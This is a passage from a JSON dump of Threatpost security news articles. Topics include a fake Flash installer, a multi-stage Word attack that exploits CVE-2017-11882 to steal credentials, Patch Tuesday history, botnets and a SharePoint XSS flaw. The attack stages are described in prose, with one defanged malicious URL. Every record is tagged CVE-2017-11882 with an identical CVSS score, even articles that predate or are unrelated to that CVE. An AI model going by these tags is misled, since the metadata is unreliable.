and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home back will be changed\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains were for the new start pages, as well as the domains hosting the malicious Flash update were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection string uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from for the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d describes researchers.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\$v=office.12\$.aspx>)\u201c. The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (rich text file format) file.\n\n\u201cWhen user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed,\u201d researchers describe.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers a MSHTA command line that downloads and executes an HTML executable HTA file. Next the HTA contains an obfuscated PowerShell Script which eventually downloads and executes the remote payload \u2013 the Password Stealer Malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. \u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "[![andrew_storms](https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg>)On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. Ten years ago, the program was announced with a press release that promised\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response from the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you have like or disdain for Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone to vendor relationships. No one likes to admit they have security problems. Microsoft took the leap of not only admitting it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today public disclosure of serious Microsoft security holes is now the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. Living in a world of constant interruption is detrimental to morale completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advanced notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high level snippet of what to expect the following week.\n\nMicrosoft also proved value with consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits to all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. Spend just five minutes today and consider where you\u2019d be today without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage.___\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think about not only finding and fixing one-off bugs, but also focus on strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contact to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even third-party established programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give into the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result were a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of those critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. \u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving only Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For the IE 10 in beta, there were 23 submissions, 18 of those would have been rated critical, including four sandbox escapes, Moussouris said. The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060134/us_botnets.jpg)](<https://threatpost.com/us-reigns-most-bot-infected-country-101310/>)The U.S. has by far the highest number of bot-infected computers of any country in the world, with nearly four times as many infected PCs as the country in second place, Brazil, according to a new report by Microsoft. The quarterly report on malicious software and Internet attacks shows that while some of the major botnets have been curtailed in recent months, the networks of infected PCs still represent a huge threat.\n\nThe data on botnets, published in [Microsoft\u2019s Security Intelligence Report](<https://www.microsoft.com/security/sir/default.aspx>) for the first half of 2010, paints a somewhat bleak picture of the botnet landscape. Between January and June of this year, Microsoft cleaned more than 6.5 million machines worldwide of bot infections, which represents a 100 percent increase in bot infections from the same period in 2009. This increase comes at a time when there is more attention than ever focused on the botnet problem, both by security researchers and law-enforcement agencies around the world.\n\nMicrosoft measures botnet infections by counting the number of machines \nthat are cleaned of bots by using the company\u2019s Malicious Software \nRemoval Tool. The Microsoft data obviously does not show a complete picture of bot infections across the entire Internet, but gives a snapshot of the infection problem on the machines the company monitors.\n\nIn the last year or so, several major spam botnets have been either completely crippled or in some way damaged by takedown efforts that target the command and control servers that run the botnets. Pushdo and Waledac are the two most prominent examples of this effort, and Microsoft officials were deeply involved in the [takedown of Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>), eventually going to court in September to get legal ownership of hundreds of IP addresses used by the botnet.\n\nThe company worked with researchers in Germany and Austria, as well as law-enforcement agencies, to gain control of the Waledac C&C servers. However, while the takedown was something of a coup, Waledac was not the top spam botnet and Microsoft\u2019s data shows that there are still a number of large botnets, many of which are far less well-known than Waledac, Pushdo and Zeus, that are wreaking havoc online.\n\nThe most commonly detected bot client in the new SIR is Rimecud, the main piece of malware that is responsible for the Mariposa botnet. In the first half of 2010, Microsoft cleaned more than 3.5 million PCs infected with Rimecud. Some of the more famous botnets, including Rustock, Nuwar and Zbot are pretty far down the list of the most active botnets.\n\n\u201cRimecud is a \u2018kit\u2019 family: different people working independently use a malware creation \nkit to create their own Rimecud botnets. Rimecud is the primary malware family behind the \nso-called Mariposa botnet, which infected millions of computers around the world in 2009 and 2010. In July of 2010, the Slovenian Criminal Police arrested a 23-year-old Slovenian citizen suspected of writing the malware code, following the February 2010 arrests of three suspected Mariposa botnet operators by the Spanish Guardia Civil,\u201d Microsoft said in the report. \u201cRimecud is a backdoor worm that spreads via fixed and removable drives, and by sending malicious hyperlinks to a victim\u2019s contacts via several popular instant messaging programs. Rimecud can be commanded to take a number of typical botnet actions, including spreading itself via removable drives, downloading and executing additional malware, and stealing passwords.\u201d\n\nRimecud is unlike many other botnets as it has its own network protocol, based on UDP, that it uses for communications between the bots and the C&C servers. A number of other botnets use modified, or somewhat customized, protocols for communication, making it more difficult for researchers to analyze the botnet\u2019s behavior. The attackers behind these botnets have become increasingly intelligent and sophisticated in recent years, and they have learned from their past mistakes, as well as the actions of researchers and law-enforcement agencies. \n\nOne of the key methods attackers have adopted to make life more difficult for researchers is to not use off-the-shelf bot software, but instead buy kits that can create custom bots.\n\n\u201cThese kits are collections of tools, sold and shared within the malware underground, that enable aspiring bot-herders to assemble their own botnet by creating and spreading customized malware variants. Several malware kits are freely available for downloading and sharing; some have been published as open source code, which enables malware developers to create modified versions of the kits.3 Other kits are developed by individual groups and sold like \nlegitimate commercial software products, sometimes even including support agreements,\u201d Microsoft said in the report. \n", "cvss3": {}, "published": "2010-10-13T16:07:04", "type": "threatpost", "title": "U.S. Reigns As Most Bot-Infected Country", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:36", "id": "THREATPOST:49045E816279C72FD35E91BF5F87387C", "href": "https://threatpost.com/us-reigns-most-bot-infected-country-101310/74570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:55", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055402/sharepoint_xss.jpg)](<https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/>)There is a [cross-site scripting flaw in SharePoint 2007](<http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html>), Microsoft\u2019s collaboration product, which could give an attacker the ability to execute arbitrary JavaScript code on a machine through a browser. \n\nHigh-Tech Bridge, a Swiss security firm, published an advisory about the vulnerability on Thursday, along with proof-of-concept code to demonstrate the exploit. \n\n\u201cThe vulnerability exists due to failure in the \u201c/_layouts/help.aspx\u201d \nscript to properly sanitize user-supplied input in \u201ccid0\u2033 variable. \nSuccessful exploitation of this vulnerability could result in a \ncompromise of the application, theft of cookie-based authentication \ncredentials, disclosure or modification of sensitive data,\u201d the company said in its advisory.\n\nMicrosoft\u2019s Security Response Center said it is working on mitigations, workarounds and a fix for the vulnerability. \n", "cvss3": {}, "published": "2010-04-29T17:12:54", "type": "threatpost", "title": "New Flaw Found in Microsoft SharePoint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:53:17", "id": "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "href": "https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/73898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[![Hotmail](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07072818/hotmailpasswords.jpg)](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nIn order to keep passwords safe from snooping, many Web sites run users\u2019 plaintext passwords through a hash function, which obscures them. Depending upon which hash function is being used, and what kind of computers is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft. _\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy \nsettings for the next version of their search engine. Currently the site strips \nSSL when forced into HTTPS and in turn, brings up an advisory on browsers signaling \nan unsafe connection.\n\n[Introduced at Toorcon, the Firefox extension ](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>)allows \nattackers to capture site cookies from users on unsecured wireless networks and \nbrowse under their logon. \n\nWith the advent of Firesheep and subsequently, its surge of recently \nconverted hackers, HTTP session hijacking is becoming more and more of a \nconcern. Sites like Bing will have to adopt suitable security techniques to \ncontend with the extensions\u2019 further proliferation. \n\nFirefox 4, scheduled for release by the end of the year will \nhelp. [As \nreported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport \nSecurity, ensuring the browser always requests a safe HTTPS session from sites. \nHowever If sites like Bing don\u2019t implement SSL into sites, the lack of full-end \nencryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network \nWorld has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n\n** \n**\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:41", "description": "Microsoft has announced it will issue nine bulletins for its July Patch Tuesday release next week. Included in the update are three critical patches for security holes that, if left unaddressed, could result in remote code execution on vulnerable systems.\n\nIn all, the Redmond, Washington company will address 16 vulnerabilities in Microsoft Windows, Internet Explorer, Microsoft Office, and the Server Software and Developer Tools products.The bulk of the releases \u2013 six updates \u2013 are rated \u201cimportant\u201d by Microsoft, which suggests they could be used to compromise systems, but not by self-spreading malware. Most deal with elevation of privilege vulnerabilities. \n\nMicrosoft hasn\u2019t said what vulnerabilities the patches will address. However, it is possible that at least one of the patches will fix a hole in Microsoft\u2019s XML Core Services. The vulnerability, [disclosed in mid-June](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>), allows remote code execution through Internet Explorer and is being actively exploited.\n\nHere\u2019s a rundown of the bulletins:\n\nBulletin ID | \n\nMaximum Severity Rating and Vulnerability Impact\n\n| Restart Requirement | Affected Software \n---|---|---|--- \nBulletin 1 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Windows \nBulletin 2 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows, \nInternet Explorer \nBulletin 3 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Windows \nBulletin 4 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | \n\nMicrosoft Office, \nMicrosoft Developer Tools \n \nBulletin 5 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Requires restart | Microsoft Windows \nBulletin 6 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows \nBulletin 7 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nInformation Disclosure | Requires restart | Microsoft Windows \nBulletin 8 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | May require restart | \n\nMicrosoft Office, \nMicrosoft Server Software \n \nBulletin 9 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Does not require restart | Microsoft Office \n \nThis is the first monthly patch release to use a new and improved version of Windows Update that fixes a vulnerability previously used by the Flame malware. [News broke last month that the malware used a forged Microsoft certificate](<https://threatpost.com/flame-attackers-used-collision-attack-forge-microsoft-certificate-060512/>) to validate its components, impersonating a Windows Update mechanism and installing malicious code in its place.\n\nAs usual, Microsoft will push the patches next Tuesday, July 10, around 1 p.m. EST. Those looking for more information on the updates should read Microsoft\u2019s advance notification on [Technet](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-06T15:03:10", "type": "threatpost", "title": "Microsoft Plans To Fix 16 Vulnerabilities With July Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:54", "id": "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "href": "https://threatpost.com/microsoft-plans-fix-16-vulnerabilities-july-patch-release-070612/76774/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:48", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060143/alex4.jpg)** \n**\n\nDatabase Management Systems (DBMS) have extended their capabilities far beyond simply serving as data storage and query systems. Contrary to what they were in the 1970\n", "cvss3": {}, "published": "2010-10-18T19:49:08", "type": "threatpost", "title": "How to Minimize Your Database Attack Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": 